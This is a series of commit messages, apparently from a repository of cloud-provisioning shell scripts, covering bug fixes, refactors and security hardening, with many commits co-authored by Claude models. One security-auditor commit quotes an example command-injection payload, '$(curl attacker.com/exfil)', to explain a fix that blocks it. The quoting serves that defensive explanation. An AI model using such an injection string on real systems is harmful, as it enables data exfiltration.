Hetzner: grep '"error"' matched '"error": null' in successful DELETE
responses, causing every server deletion to log "Failed to destroy
server" and return 1 even when the server was actually destroyed.
Fix: use jq -e '.action' (consistent with create_server's approach)
which is only present on success.
Daytona: >/dev/null 2>&1 || true suppressed all errors and always
logged "Sandbox destroyed" regardless of outcome. Fix: capture response,
check exit code and error JSON fields, log billing warning on failure.
Same class of bug as AWS (#1606) and GCP/DigitalOcean (#1615).
Agent: team-lead
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Both cloud_authenticate() functions use jq for JSON construction in
create_server() but never verify jq is installed. On minimal Ubuntu/
Debian, Alpine, or fresh macOS without Homebrew, this causes a hard
failure with "jq: command not found" after the user has already entered
their API token. ensure_jq() in shared/common.sh auto-installs jq on
Linux/macOS -- wire it in before the first jq-dependent call.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
- ensure_api_token_with_provider now validates env-var tokens with
the provider test function, matching config-file token behavior.
Previously, stale env-var tokens silently passed auth and failed
at server creation with cryptic API errors.
- Add prompt_spawn_name to Hetzner and Daytona cloud_authenticate,
matching the pattern used by AWS, Fly, GCP, DigitalOcean, and
Sprite. Without this, SPAWN_NAME_KEBAB is never set and server
name prompts have no pre-filled default on these two providers.
- Remove redundant register_cleanup_trap from DigitalOcean
cloud_authenticate. shared/common.sh auto-registers the trap at
source time (line 3696), making the explicit call dead code.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: rewrite hetzner common.sh + fix token prompt bug in shared/common.sh
Hetzner: rewrote from 621 to 224 lines. Removed hcloud CLI dual-path
fallback, server type validation/fallback chain (11 functions), and
duplicate CLI+API implementations. Now API-only like DigitalOcean.
Shared: fixed echo "" in _prompt_for_api_token, get_openrouter_api_key_manual,
and get_openrouter_api_key_oauth writing to stdout instead of stderr.
These functions are called inside $(...) command substitutions, so the
newlines got prepended to the captured token, causing "unable to
authenticate" errors when pasting tokens at the prompt.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: rewrite daytona common.sh — API-only, drop CLI dependency
Rewrote from 312 to 174 lines. Removed daytona CLI dependency in
favor of direct REST API calls. Matches the same API-only pattern
used by Hetzner, DigitalOcean, and other clouds.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pass SSH port to control master exit in daytona interactive/destroy
The ssh -O exit command to close the multiplexed master was missing
the -p PORT flag when DAYTONA_SSH_PORT is set. This left the master
connection open, causing "mux_client: master did not respond" errors
when the interactive session tried to allocate a PTY.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add spawn name prompt and project confirmation to GCP flow
Ask for spawn name upfront (before auth), derive kebab-case default for
VM naming, and confirm the current GCP project before using it.
New interaction order:
1. Spawn name: "My Dev Box" → kebab "my-dev-box" exported as
GCP_INSTANCE_NAME_KEBAB
2. gcloud auth + project confirm: "Current project: X Keep? [Y/n]"
If no → project picker shown
3. SSH key
4. Machine type picker (existing)
5. Zone picker (existing)
6. Instance name prompt: "Instance name [my-dev-box]: "
User can press Enter to accept or type a custom name
New functions:
_to_kebab_case() — lowercases, replaces non-alnum with hyphens
_gcp_prompt_spawn_name() — prompts for display name, exports kebab default;
honours SPAWN_NAME env var set by CLI (--name flag)
Modified:
_gcp_resolve_project() — adds Y/n confirmation when project already set
get_server_name() — shows kebab default in prompt, accepts Enter
cloud_authenticate() — calls _gcp_prompt_spawn_name first
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* feat: add spawn name prompt to all clouds via shared/common.sh
Move _to_kebab_case() and prompt_spawn_name() to shared/common.sh so all
clouds get upfront spawn name prompting and kebab-based resource naming.
shared/common.sh:
+ _to_kebab_case() — "My Dev Box" → "my-dev-box"
+ prompt_spawn_name() — asks for display name, exports SPAWN_NAME_DISPLAY
and SPAWN_NAME_KEBAB; skips if already set;
honours SPAWN_NAME env var from CLI --name flag
~ get_resource_name() — replaces silent SPAWN_NAME fallback with a visible
prefilled default: "Enter server name [my-dev-box]: "
Per-cloud changes (cloud_authenticate gains prompt_spawn_name first):
hetzner, fly, aws, daytona, digitalocean, sprite — one-line change each
gcp/lib/common.sh:
- Remove _to_kebab_case() (now in shared)
- Remove _gcp_prompt_spawn_name() (now in shared as prompt_spawn_name)
~ cloud_authenticate: _gcp_prompt_spawn_name → prompt_spawn_name
~ get_server_name: simplified back to get_validated_server_name
(shared get_resource_name now shows the kebab default in the prompt)
Result — every cloud shows this flow upfront:
Spawn name (e.g. "My Dev Box"): My Claude Box
ℹ Resource name: my-claude-box
...
Enter server name [my-claude-box]: ⏎
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* fix: use "Use project '...'?" instead of "Keep this project?" in GCP prompt
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
When server creation fails with account-level errors (server limit
reached, insufficient funds, quota exceeded), offer to switch to a
different Hetzner API token and retry instead of just failing.
- Add _is_hetzner_account_error() to detect account-level issues
- Return exit code 2 from create_server() for account errors
- cloud_provision() catches code 2, prompts "Try a different account?"
- On yes: re-prompts for new API key, re-registers SSH keys, retries
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds
aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.
Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.
Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: update aider/gptme/interpreter assertions from pip to uv
The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).
Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* ci: trigger test run for uv assertion fix
* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds
- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
$escaped_cmd that prevented the remote shell from consuming escapes,
breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
where it escaped shell operators into literal characters since daytona exec
has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add --pty to fly ssh console for interactive sessions
fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.
Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: prepend ~/.local/bin to PATH in ssh_run_server
After uv installs to ~/.local/bin, the current shell session doesn't
have it in PATH, causing "uv: command not found" on DigitalOcean and
all other SSH-based clouds (Hetzner, AWS, GCP, OVH).
Fly.io's run_server already prepends this PATH — now the shared
ssh_run_server does the same, fixing all SSH-based clouds at once.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add Node.js to cloud-init for all cloud providers
npm-based agents (codex, kilocode, etc.) fail with "npm: command not
found" because Node.js isn't installed during cloud-init. Fly.io was
the only provider installing Node.js (in wait_for_cloud_init).
Now all cloud-init scripts install Node.js v22 LTS from nodesource,
matching Fly.io's setup. Also adds ~/.local/bin to PATH in AWS and
GCP cloud-init (was already in shared/DigitalOcean/Hetzner).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use apt packages for nodejs/npm instead of nodesource
The nodesource setup script (setup_22.x) runs its own apt-get update
and repository configuration, nearly doubling cloud-init time and
causing hangs on DigitalOcean. Ubuntu 24.04 includes nodejs and npm
in its default repos — just add them to the packages list.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add timeouts and better error handling to Daytona CLI commands
Daytona CLI commands (login, list, create) can hang indefinitely when
the API is slow or unreachable. This causes:
- "Failed to create sandbox: timeout" with no recovery
- Token validation timeouts misreported as "invalid token"
- Users re-entering valid tokens that also timeout
Fixes:
- Wrap all daytona CLI calls with timeout (30s for auth, 120s for create)
- Detect timeout errors separately from auth errors
- Show actionable "try again / check status" messages for timeouts
- Add nodejs/npm to Daytona wait_for_cloud_init
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: set DAYTONA_API_URL to Daytona Cloud by default
The Daytona CLI may default to connecting to a local self-hosted
server instead of Daytona Cloud. Without DAYTONA_API_URL set to
https://app.daytona.io/api, every CLI command (login, list, create)
hangs trying to reach a non-existent local server and times out.
The SDK documents this as the default, but the CLI doesn't always
pick it up — now we export it explicitly.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: symlink n-installed Node.js v22 over apt v18 to prevent shadowing
n installs Node.js v22 to /usr/local/bin/node but apt's v18 at
/usr/bin/node can shadow it in non-interactive SSH sessions. After
n 22, symlink the new binaries over the apt ones so v22 is always
resolved. Also fix hcloud CLI token extraction for new TOML format.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review, add curl timeouts to trigger workflows
- Fix ssh_run_server command injection concern: use single-quoted
path_prefix so $HOME/$PATH expand remotely, not locally
- Add --connect-timeout 15 --max-time 30 to trigger workflows to
prevent 5-min hangs when server streams responses
- Handle 409 (dedup) as success — expected when cron fires every 15min
but cycles take 35min
- Reduce workflow timeout-minutes from 5 to 2
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Fixes#1411
Replaced unsafe xargs -I{} pattern with grep -F for literal string matching
to prevent command injection if the hcloud context name contains shell
metacharacters.
Previous code: xargs interpolated context name directly into grep pattern
New code: grep -F treats context name as literal string (no interpretation)
Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)'
could execute arbitrary commands during token extraction.
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes#1376 - HIGH severity path traversal in CLI installer
Fixes#1377 - MEDIUM severity unquoted variable in hetzner token extraction
Changes:
- cli/install.sh: Replace string prefix matching with canonicalized path
comparison to prevent path traversal in rm -rf cleanup. The previous
check could be bypassed with sequences like "/tmp/../../home/user".
- hetzner/lib/common.sh: Quote xargs placeholder variable to prevent
unexpected behavior if hcloud context name contains shell metacharacters.
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: auto-run gcloud auth login on expired GCP tokens
Instead of telling users to run `gcloud auth login` manually, just
run it automatically when auth check fails or instance creation hits
a reauthentication error, then retry.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: prioritize clouds with CLI installed + hcloud CLI integration
When selecting a cloud provider, clouds are now sorted in 3 tiers:
1. Credentials detected (env vars set) — top priority
2. CLI installed (e.g., gcloud, hcloud, aws) — middle priority
3. Neither — default order
Also adds hcloud CLI-first support for Hetzner operations (server
create/delete/list, SSH key management, auth) with automatic fallback
to the existing REST API when hcloud is not available.
Closes#1370
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* refactor: rename aws-lightsail to aws across the project
Simplifies the cloud key from "aws-lightsail" to "aws" — AWS should
have a single entry regardless of the underlying service used.
Renames the directory, updates manifest.json matrix keys, CLI map,
test fixtures, README, and all agent scripts.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Prevent silent failures when cloud API responses don't contain expected
server/instance IDs or IPs. Without these checks, scripts would continue
with empty variables, leading to cryptic failures downstream (e.g., "ssh
root@" or API calls with empty IDs).
Changes:
- fly: Check FLY_MACHINE_ID after extraction, fail fast with clear error
- ovh: Check OVH_INSTANCE_ID after extraction, fail fast with clear error
- hetzner: Check HETZNER_SERVER_ID and HETZNER_SERVER_IP (+ null check for jq)
- digitalocean: Check DO_DROPLET_ID after extraction, fail fast with clear error
Impact: Improves reliability by catching API response parsing failures
immediately rather than propagating empty values to SSH/API calls.
Agent: code-health
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Wire up connection tracking across all 10 clouds so users can reconnect
to and delete previously spawned servers via `spawn list` and `spawn delete`.
Phase 1 - Connection tracking:
- Extend save_vm_connection() with cloud and metadata params
- Add save_vm_connection to create_server() in all cloud libs
- Extend VMConnection with cloud, deleted, deleted_at, metadata fields
Phase 2 - Delete via interactive picker:
- Add "Delete this server" option to spawn list picker
- Build delete scripts that reuse each cloud's destroy_server()
- Confirmation UX with spinner feedback
- Soft-delete marking in history (deleted records show [deleted])
Phase 3 - Standalone delete command:
- spawn delete (aliases: rm, destroy) with interactive picker
- Filter support: spawn delete -a <agent> -c <cloud>
Also improves reconnect hints for Fly (fly ssh console) and
Daytona (daytona ssh) connections.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Extract helper functions to simplify complex control flow:
- try_oauth_flow: Extract _start_oauth_session_with_server helper to handle server startup phase, improving readability and testability
- _hetzner_resolve_server_type: Extract _hetzner_log_validation_error and _hetzner_log_type_change helpers to separate error handling logic from main flow
These changes reduce nesting levels and improve function cohesion while maintaining identical behavior.
Agent: complexity-hunter
Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
After an interactive SSH session ends, users are now shown:
- A warning that their server is still running (and may incur charges)
- A link to the cloud provider's dashboard to manage/delete it
- The SSH command to reconnect
This prevents users from unknowingly leaving servers running after
exiting their agent session. Covers all 25 SSH-based cloud providers.
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
When server destruction fails, users are left with a bare error message and
no indication that they may still be billed for a running server. This adds
dashboard URLs and clear warnings to destroy_server errors across 9 clouds
(Hetzner, UpCloud, Contabo, Netcup, RamNode, Hostinger, HOSTKEY, OVH,
Latitude). Also improves error messages for Koyeb (app creation, service
deployment, deployment timeout, instance ID), GitHub Codespaces (creation
failure, readiness timeout), and E2B (sandbox creation failure).
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
SSH key registration in 11 cloud providers used unescaped key_name
directly in JSON request bodies. If the hostname (used to generate
key names) contained JSON-special characters like double-quotes, it
could break out of the JSON string and inject arbitrary JSON fields.
Fix: use json_escape for key_name in all providers, matching the
pattern already used by Scaleway.
Also fix GCP create_server which embedded the startup script inline
in --metadata with comma delimiters. Commas in the script could break
metadata parsing or inject additional metadata keys. Fix: use
--metadata-from-file for the startup script.
Affected providers: Hetzner, DigitalOcean, Vultr, BinaryLane,
Hostinger, Contabo, Cherry, HOSTKEY, Civo, Linode, Genesis Cloud, GCP.
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Extract `ensure_jq()` from hetzner and hostkey into shared/common.sh,
eliminating 64 lines of identical duplicated code
- Decompose DigitalOcean `create_server()` by extracting error handling
into `_do_check_create_error()` helper, and using the shared
`extract_api_error_message` instead of inline Python parsing
- Use shared `_extract_json_field` for droplet ID extraction
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Extract _hetzner_find_candidates helper to eliminate duplicated jq
candidate-search logic (same-family and any-family searches were
nearly identical 15-line blocks)
- Consolidate 3 separate jq calls for wanted_cpu/cores/memory into
a single jq invocation
- Replace duplicated replacement-picking code with a loop over
family strategies
Function reduced from 106 to ~72 lines (plus 17-line reusable helper).
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Hetzner lib: replace all Python JSON parsing with jq. Uses the
/datacenters API as the authoritative source for server type
availability (server_types.available), cross-referenced with
/server_types for specs and pricing. jq is auto-installed if missing.
URLs: update openrouter.ai/lab/spawn → openrouter.ai/labs/spawn
across all READMEs and CLI source.
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
When HETZNER_SERVER_TYPE and HETZNER_LOCATION are both pre-set (e.g. by
automated scripts), there was no validation that the type is actually
available at that location. ARM types like cax11 are only available in
EU datacenters, causing "unsupported location for server type" errors
when paired with US locations like ash.
Now create_server validates the type against the Hetzner /datacenters
API (server_types.available) before attempting creation. If incompatible,
it auto-selects the cheapest compatible alternative (same CPU family,
>= specs) and warns the user.
Uses jq for JSON parsing (auto-installed if missing) and the Hetzner
/datacenters + /server_types APIs for authoritative availability data.
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Replace 10 inline `python3 -c "import json,sys; d=json.loads(...)..."` one-liners
across vultr, hetzner, digitalocean, and contabo with calls to a new shared
`extract_api_error_message` helper in shared/common.sh. The helper tries common
JSON error field patterns (message, error, error.message, error.error_message,
reason) and falls back to a caller-specified default.
This pattern appears 35+ times across cloud libs; this PR converts the first 4
clouds as a proof of concept. Remaining clouds can adopt incrementally.
Net reduction: 10 lines per converted cloud (~3 lines saved per call site).
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Use sys.argv to pass shell values to inline Python instead of direct
string interpolation, preventing single-quote injection attacks across
cloud lib common.sh files and test/record.sh.
Also fix eval injection in test/record.sh try_load_config() by replacing
eval of Python-generated export statements with safe tab-separated
parsing and direct variable assignment.
Fixes#759Fixes#760
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
13 cloud providers had identical 5-line check_ssh_key functions that
fetch SSH keys from the provider API and grep for the fingerprint.
Extract this pattern into a shared check_ssh_key_by_fingerprint helper
in shared/common.sh, reducing each cloud's function to a single line.
Affected clouds: BinaryLane, Cherry, Civo, Contabo, DigitalOcean,
Genesis Cloud, Hetzner, Hostinger, Latitude, Linode, OVH, Scaleway,
Vultr.
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
18 cloud lib/common.sh files had identical 7-line get_server_name()
functions (get_resource_name + validate_server_name + echo). Added a
shared get_validated_server_name helper to shared/common.sh and replaced
all duplicates with one-line delegations. Net -110 lines.
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Add log_step() function (cyan) for status/progress messages
- Convert misused log_warn calls to log_step in shared/common.sh
(14 instances: SSH key gen, agent verification, waiting, configuring)
- Convert representative cloud scripts: hetzner, digitalocean, sprite
- Fix misleading validatePrompt error that suggested --prompt-file as a
workaround when it has the same validation
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Add ssh_run_server, ssh_upload_file, ssh_interactive_session, and
ssh_verify_connectivity to shared/common.sh. These four functions
were copy-pasted identically across 21 cloud provider lib files,
differing only in SSH username (root vs ubuntu).
Providers now set SSH_USER and delegate to the shared helpers via
one-line wrappers, reducing each provider's lib by ~20 lines.
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Extract JSON body builders and error handlers from the two largest
remaining create_server() functions (hetzner 84->43, hostinger 76->44
lines), following the pattern established in PR #423.
Extracted helpers:
- hetzner: _hetzner_build_create_body(), _hetzner_check_create_error()
- hostinger: _hostinger_build_create_body(), _hostinger_handle_create_error()
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Fix triple-quote injection in SSH keys (Scaleway, UpCloud), userdata
(BinaryLane), init scripts (Civo, Kamatera), and GraphQL queries
(RunPod) by passing data via stdin/json_escape instead of inline
string interpolation
- Add input validation for all cloud provider env vars (region, type,
plan, etc.) using validate_region_name/validate_resource_name to block
shell metacharacters before they reach Python string interpolation
- Validate Modal image name as Python identifier to prevent code injection
- Validate numeric env vars (RAM, GPU count, disk size) across all providers
Affects: 19 cloud provider lib/common.sh files
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* ux: Improve error messages and user guidance across CLI and shell scripts
Enhanced error messages to be more actionable and user-friendly:
CLI improvements (commands.ts):
- Made validateNonEmptyString clearer: "is required but was not provided"
- Reordered troubleshooting steps to check matrix first (most common issue)
- Simplified 404 error message: "doesn't exist yet" vs "may not be implemented"
- Changed "Troubleshooting steps" to just "Troubleshooting" (less formal)
Shared library improvements (shared/common.sh):
- OAuth cancellation now explains why API key is needed and where to get it
- safe_read non-TTY error explains what non-interactive mode is with example
- get_resource_name error shows exact env var syntax needed
- Agent verification failures now list specific possible causes
- All improvements add context and next steps rather than just stating the problem
Hetzner library improvements (hetzner/lib/common.sh):
- Replaced technical "Remediation" with friendly "How to fix"
- Changed log_warn to log_error for error conditions (consistent severity)
- Added spacing for better readability of multi-line errors
- Made server creation errors more specific about account issues
All changes focus on helping users understand WHAT went wrong and HOW to fix it.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: Replace issue-triager with community-coordinator agent
Replace the issue-triager agent in the refactor team with a
community-coordinator that actively engages with GitHub issues:
acknowledges reports, posts interim updates, delegates to relevant
teammates, and posts final resolutions — so reporters feel heard.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- hetzner/lib/common.sh:31 - HCLOUD_TOKEN set by caller
- digitalocean/lib/common.sh:36 - DO_API_TOKEN set by caller
- Silences false positive warnings for intentionally external variables
- These tokens are exported by ensure_*_token functions before use
Fixed 2 critical syntax errors in API error handling:
- Hetzner line 160-161: Malformed error_msg assignment
- DigitalOcean line 172-173: Broken error_msg assignment
These were introduced during Round 15 refactoring and would crash
whenever users encountered API errors during server creation.
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
Add SC2086 disable comments to interactive_session() functions in
GCP, Hetzner, and DigitalOcean providers. SSH_OPTS is intentionally
unquoted to allow word splitting for multiple SSH options.
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
Eliminates duplicate SSH key registration logic across 5 cloud providers
(Hetzner, DigitalOcean, Vultr, Linode, Lambda) by introducing a generic
callback-based pattern in shared/common.sh.
Before: Each provider had ~45 lines of nearly identical code for:
- Generating SSH keys if missing
- Getting fingerprints
- Checking if key exists with provider
- Registering key if not exists
- Error handling
After: Providers implement 2 simple callbacks:
- check_callback: provider-specific API call to check if key exists
- register_callback: provider-specific API call to register key
The shared function handles:
- Key generation (via generate_ssh_key_if_missing)
- Fingerprint extraction (via get_ssh_fingerprint)
- Flow control and logging
- Callback orchestration
Changes:
- shared/common.sh: Added ensure_ssh_key_with_provider() function
- hetzner/lib/common.sh: Refactored to use callbacks
- digitalocean/lib/common.sh: Refactored to use callbacks
- vultr/lib/common.sh: Refactored to use callbacks
- linode/lib/common.sh: Refactored to use callbacks
- lambda/lib/common.sh: Refactored to use callbacks
Benefits:
- DRY: Eliminates ~220 lines of duplicate code
- Maintainability: Bug fixes in registration flow benefit all providers
- Consistency: All providers use identical registration logic
- Extensibility: New providers can reuse this pattern
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
SSH_OPTS contains multiple flags that must be word-split, so unquoted
usage is intentional. Added shellcheck directives to suppress false
positive warnings across all cloud provider common.sh files.
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
Added shellcheck directive comments before first SSH_OPTS usage in:
- aws-lightsail/lib/common.sh
- gcp/lib/common.sh
- lambda/lib/common.sh
- vultr/lib/common.sh
- linode/lib/common.sh
- hetzner/lib/common.sh
- digitalocean/lib/common.sh
SSH_OPTS is defined in shared/common.sh but shellcheck can't detect
cross-file variable definitions, so we suppress the warning with
an explanatory comment.
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
Protects against 'unbound variable' errors even if set -u is
re-enabled or inherited. Every [[ -n "$UPPER_VAR" ]] pattern now
uses [[ -n "${UPPER_VAR:-}" ]] to safely default to empty.
Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The autonomous refactoring added `set -euo pipefail` but the scripts
check optional env vars with `[[ -n "$VAR" ]]` which is a fatal error
under nounset when the var isn't set (e.g. SPRITE_NAME, OPENROUTER_API_KEY).
Fix: downgrade to `set -eo pipefail` across all 42 affected files.
Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
When scripts run via `bash <(curl ...)`, BASH_SOURCE resolves to
/dev/fd/N, making the relative path `../../shared/common.sh` fail.
Fix: add remote fallback — try local file first, fall back to
fetching shared/common.sh from GitHub via eval+curl.
Applied to all 5 refactored lib/common.sh files (sprite, hetzner,
digitalocean, vultr, linode).
Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Three issues broke the OAuth callback server on macOS:
1. echo -e doesn't work in bash 3.x — \r\n appears as literal text
in the HTTP response, browser gets malformed headers.
Fix: pre-write response with printf to a file before the subshell.
2. local variables inside ( ... ) & subshell — undefined behavior in
bash 3.x since subshells aren't function scope.
Fix: use plain variables in subshells.
3. ((elapsed++)) when elapsed=0 evaluates to falsy — set -e kills
the script on the first iteration of the timeout loop.
Fix: use elapsed=$((elapsed + 1)) instead.
Also simplified nc_listen detection to only check for BusyBox
(the -p flag check could misfire on macOS nc).
Applied to all 10 lib/common.sh files.
Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Parallel to the existing sprite/ directory, adds hetzner/ scripts that
provision Hetzner Cloud servers with Claude Code + OpenRouter using
curl-based API calls (no hcloud CLI dependency).
Co-authored-by: Sprite <noreply@sprite.dev>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>